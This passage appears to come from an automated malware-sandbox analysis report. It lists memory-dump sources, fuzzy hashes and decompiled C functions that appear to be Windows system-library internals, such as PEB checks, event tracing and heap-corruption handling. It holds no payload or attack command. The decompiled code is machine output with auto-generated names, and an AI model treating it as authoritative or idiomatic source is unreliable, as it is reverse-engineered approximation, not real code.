                                                              			}


















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e9f1a8d11b6068d9f20ed726d28be925f805d823692a9e2591fd221a7a922ea
                                                              • Instruction ID: 072b216b82332c2e8b1daa6f90aaf22a2f6c2f8f1d2b37c9c1aba869ccceff5d
                                                              • Opcode Fuzzy Hash: 2e9f1a8d11b6068d9f20ed726d28be925f805d823692a9e2591fd221a7a922ea
                                                              • Instruction Fuzzy Hash: 4D015271E04218AFDB14DFA9D845FAEB7B8EF44710F0440AAF905EB280EA74AE41C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                              				signed char _t11;
                                                              				signed char* _t12;
                                                              				intOrPtr _t24;
                                                              				signed short* _t25;
                                                              
                                                              				_t25 = __edx;
                                                              				_t24 = __ecx;
                                                              				_t11 = ( *[fs:0x30])[0x50];
                                                              				if(_t11 != 0) {
                                                              					if( *_t11 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              					L2:
                                                              					if( *_t12 != 0) {
                                                              						_t12 =  *[fs:0x30];
                                                              						if((_t12[0x240] & 0x00000004) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						if(E04BB7D50() == 0) {
                                                              							_t12 = 0x7ffe0385;
                                                              						} else {
                                                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t12 & 0x00000020) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						return E04C17016(_a4, _t24, 0, 0, _t25, 0);
                                                              					}
                                                              					L3:
                                                              					return _t12;
                                                              				}
                                                              				L1:
                                                              				_t12 = 0x7ffe0384;
                                                              				goto L2;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction ID: e9b9c233984c4055b673e041ba2870839c03f4cb1e980d432b17ec6ea630f5a4
                                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction Fuzzy Hash: 250171712095809FD326C76CC944F6677D8EB45754F0940E1EA29CBA51D668FC40D620
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C61074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                              				char _v8;
                                                              				void* _v11;
                                                              				unsigned int _v12;
                                                              				void* _v15;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				char* _t16;
                                                              				signed int* _t35;
                                                              
                                                              				_t22 = __ebx;
                                                              				_t35 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t13 =  !( *__ecx) + 1;
                                                              				_v12 =  !( *__ecx) + 1;
                                                              				if(_a4 != 0) {
                                                              					E04C6165E(__ebx, 0x4c88ae4, (__edx -  *0x4c88b04 >> 0x14) + (__edx -  *0x4c88b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c88b04 >> 0x14) + (__edx -  *0x4c88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                              				}
                                                              				E04C5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                              				if(E04BB7D50() == 0) {
                                                              					_t16 = 0x7ffe0388;
                                                              				} else {
                                                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				if( *_t16 != 0) {
                                                              					_t16 = E04C4FE3F(_t22, _t35, _v8, _v12);
                                                              				}
                                                              				return _t16;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5c0ef9fe3aca41a3f1fb3ce3759526524dc0be4e4d4798085ef1e8d43bcb802
                                                              • Instruction ID: 65d325bfdcb306c76421774a5cb37ca9bf7d7d325f143c04649a31bca051ccd9
                                                              • Opcode Fuzzy Hash: a5c0ef9fe3aca41a3f1fb3ce3759526524dc0be4e4d4798085ef1e8d43bcb802
                                                              • Instruction Fuzzy Hash: BE014C725047419FD710EF29C940B1A77E6EBC4315F08C629F88683690EE71F941DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04C4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E04BDFA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x266;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86280a3543a7d2ca9270fb35bc1e30c58de96c3e788e92f0f49d4214bbc254f6
                                                              • Instruction ID: 64f70b49a1921be9644a1311836b67b86fdec0cfbec02f11f7a85492449f3864
                                                              • Opcode Fuzzy Hash: 86280a3543a7d2ca9270fb35bc1e30c58de96c3e788e92f0f49d4214bbc254f6
                                                              • Instruction Fuzzy Hash: 7C018871E04218ABD714DFA9D945FAEB7B8EF45714F0440AAF9019B280E974AE01C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04C4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E04BDFA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x267;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e36ecf7b76ad9575bb7dba4cb0bf4d992fce76280edc8ca0889560afceedfbaa
                                                              • Instruction ID: 3876f76abe0098705b8cfb0f53f7953e15c5756e928488398f32bf13c77827a4
                                                              • Opcode Fuzzy Hash: e36ecf7b76ad9575bb7dba4cb0bf4d992fce76280edc8ca0889560afceedfbaa
                                                              • Instruction Fuzzy Hash: B7018871E04618ABD714DFA9D845FAEB7B8EF44714F0440AAF9019B281E974AA01C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04C68ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				short _v62;
                                                              				char _v68;
                                                              				signed char* _t29;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t41;
                                                              				intOrPtr _t42;
                                                              				signed int _t43;
                                                              
                                                              				_t40 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t43;
                                                              				_v28 = __ecx;
                                                              				_v62 = 0x1c2a;
                                                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                              				_v24 = __edx;
                                                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t29 = 0x7ffe0386;
                                                              				} else {
                                                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v68);
                                                              				_push(0x1c);
                                                              				_push(0x20402);
                                                              				_push( *_t29 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bdafcc50887d070f1596140821299cacfb4443080eb8ef9405543429ee04e05
                                                              • Instruction ID: 3ebcd2d60579e91e7d8f31f39b13a7aaaf961c8e53c38c23e9a414c9e3d9fcdd
                                                              • Opcode Fuzzy Hash: 6bdafcc50887d070f1596140821299cacfb4443080eb8ef9405543429ee04e05
                                                              • Instruction Fuzzy Hash: 50112170E052199FDB04DFA9D441BAEF7F4FF08300F0442AAE519EB382E634A940CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04C68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t31 = _a8;
                                                              				_t30 = _a12;
                                                              				_v66 = 0x1c20;
                                                              				_v40 = __ecx;
                                                              				_v36 = __edx;
                                                              				_v32 = _a4;
                                                              				_v28 = _a8;
                                                              				_v24 = _a12;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v72);
                                                              				_push(0x14);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fa08c78af7226f3c274f02b13ed446046188c713380e6868935787e29268780
                                                              • Instruction ID: a6f26daeaed3bcd751773a2387777c5b7a6976c6b44e2fc69acc489ff63ddb42
                                                              • Opcode Fuzzy Hash: 0fa08c78af7226f3c274f02b13ed446046188c713380e6868935787e29268780
                                                              • Instruction Fuzzy Hash: 260121B1A0121D9FDB04DFA9D9419EEB7B8EF48710F10409AF905E7341EA34AD01CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9DB60(signed int __ecx) {
                                                              				intOrPtr* _t9;
                                                              				void* _t12;
                                                              				void* _t13;
                                                              				intOrPtr _t14;
                                                              
                                                              				_t9 = __ecx;
                                                              				_t14 = 0;
                                                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                              					_t13 = 0xc000000d;
                                                              				} else {
                                                              					_t14 = E04B9DB40();
                                                              					if(_t14 == 0) {
                                                              						_t13 = 0xc0000017;
                                                              					} else {
                                                              						_t13 = E04B9E7B0(__ecx, _t12, _t14, 0xfff);
                                                              						if(_t13 < 0) {
                                                              							L04B9E8B0(__ecx, _t14, 0xfff);
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                              							_t14 = 0;
                                                              						} else {
                                                              							_t13 = 0;
                                                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                              						}
                                                              					}
                                                              				}
                                                              				 *_t9 = _t14;
                                                              				return _t13;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction ID: 92287a91ce090b056458ead4a63e7ab099444139a9e44f8bd67a645b9214783b
                                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction Fuzzy Hash: CDF0C8332015229BEB725A974890B67B6DD8FC1B64F1600B5B1099B244CB60AC0296D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                              				signed char* _t13;
                                                              				intOrPtr _t22;
                                                              				char _t23;
                                                              
                                                              				_t23 = __edx;
                                                              				_t22 = __ecx;
                                                              				if(E04BB7D50() != 0) {
                                                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				} else {
                                                              					_t13 = 0x7ffe0384;
                                                              				}
                                                              				if( *_t13 != 0) {
                                                              					_t13 =  *[fs:0x30];
                                                              					if((_t13[0x240] & 0x00000004) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					if(E04BB7D50() == 0) {
                                                              						_t13 = 0x7ffe0385;
                                                              					} else {
                                                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              					}
                                                              					if(( *_t13 & 0x00000020) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					return E04C17016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                              				} else {
                                                              					L3:
                                                              					return _t13;
                                                              				}
                                                              			}







                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction ID: 4fee588129b9ae66c54b60a894237feadb95be8ad19051309043140780cc6031
                                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction Fuzzy Hash: 9B01D1322046809BDB269B5DDC04F6A7BD9FF92754F0804F2FA188B6B1EA78FC01D214
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E04C2FE87(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_v16 = __ecx;
                                                              				_v54 = 0x1722;
                                                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0382;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92f55eae3dea6b7aafd34d146f4d430eb7b9eddff5c449dac64878819593f2c9
                                                              • Instruction ID: 34cc80f4b2f648d5929988ef06fbdea8646444bb198a6de181935f460473419d
                                                              • Opcode Fuzzy Hash: 92f55eae3dea6b7aafd34d146f4d430eb7b9eddff5c449dac64878819593f2c9
                                                              • Instruction Fuzzy Hash: 78016274A0421CAFCB14DFA8D541A6EB7F4EF04304F144199B505DB382EA75EA01DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E04C68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t32;
                                                              				_v16 = __ecx;
                                                              				_v50 = 0x1c2c;
                                                              				_v24 = _a4;
                                                              				_v20 = _a8;
                                                              				_v12 = __edx;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fab141605ba3aaaa9a3472f143f63af6bc0ea2f2627a58589dc0940d59021247
                                                              • Instruction ID: 684077918d600890c440fb20a06b32801158e917fa57b8a70f1a40f7164296dc
                                                              • Opcode Fuzzy Hash: fab141605ba3aaaa9a3472f143f63af6bc0ea2f2627a58589dc0940d59021247
                                                              • Instruction Fuzzy Hash: 30014474A0520CAFDB04EFA8D545AAEB7F4EF48700F108499F905EB380EA74EA00DB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E04C5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t32;
                                                              				_v20 = _a4;
                                                              				_v12 = _a8;
                                                              				_v24 = __ecx;
                                                              				_v16 = __edx;
                                                              				_v50 = 0x1021;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0380;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cabbcee057fb25927fbc5fefaa3e0998b2d25b918972553ba7a6eea01db802f
                                                              • Instruction ID: b6a901070e000627097ff807a5c7be8256cd4a68ee7274bbc064af651d93eb85
                                                              • Opcode Fuzzy Hash: 1cabbcee057fb25927fbc5fefaa3e0998b2d25b918972553ba7a6eea01db802f
                                                              • Instruction Fuzzy Hash: B3013171E05208AFDB04DFA9D545AAEB7F4FF48700F044099FC45EB391EA74AA40DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BBC577(void* __ecx, char _a4) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t17;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              
                                                              				_t18 = __ecx;
                                                              				_t21 = __ecx;
                                                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04BBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					__eflags = _a4;
                                                              					if(__eflags != 0) {
                                                              						L10:
                                                              						E04C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                              						L9:
                                                              						return 0;
                                                              					}
                                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              					if(__eflags == 0) {
                                                              						goto L10;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}










                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63d6142d57bc092ce41bd47650ff11c4dcc16942ca98b4c8ea30e74ecfd505fb
                                                              • Instruction ID: a2fb4e496f64c0939d36c582d2418e84b087020544769dba6a132b7e1373c66c
                                                              • Opcode Fuzzy Hash: 63d6142d57bc092ce41bd47650ff11c4dcc16942ca98b4c8ea30e74ecfd505fb
                                                              • Instruction Fuzzy Hash: 9BF06DB29156909AE721DE188045BB67FF4DB05664F44C4EED59687642C7E4F880C2D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E04C52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                              				void* __esi;
                                                              				signed char _t3;
                                                              				signed char _t7;
                                                              				void* _t19;
                                                              
                                                              				_t17 = __ecx;
                                                              				_t3 = E04C4FD22(__ecx);
                                                              				_t19 =  *0x4c8849c - _t3; // 0x0
                                                              				if(_t19 == 0) {
                                                              					__eflags = _t17 -  *0x4c88748; // 0x0
                                                              					if(__eflags <= 0) {
                                                              						E04C51C06();
                                                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                              						__eflags = _t3;
                                                              						if(_t3 != 0) {
                                                              							L5:
                                                              							__eflags =  *0x4c88724 & 0x00000004;
                                                              							if(( *0x4c88724 & 0x00000004) == 0) {
                                                              								asm("int3");
                                                              								return _t3;
                                                              							}
                                                              						} else {
                                                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                              							__eflags = _t3 - 3;
                                                              							if(_t3 == 3) {
                                                              								goto L5;
                                                              							}
                                                              						}
                                                              					}
                                                              					return _t3;
                                                              				} else {
                                                              					_t7 =  *0x4c88724; // 0x0
                                                              					return E04C48DF1(__ebx, 0xc0000374, 0x4c85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                              				}
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E04C68D34(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				short _v42;
                                                              				char _v48;
                                                              				signed char* _t12;
                                                              				intOrPtr _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t25;
                                                              				signed int _t26;
                                                              
                                                              				_t23 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t26;
                                                              				_v16 = __ecx;
                                                              				_v42 = 0x1c2b;
                                                              				_v12 = __edx;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t12 = 0x7ffe0386;
                                                              				} else {
                                                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v48);
                                                              				_push(8);
                                                              				_push(0x20402);
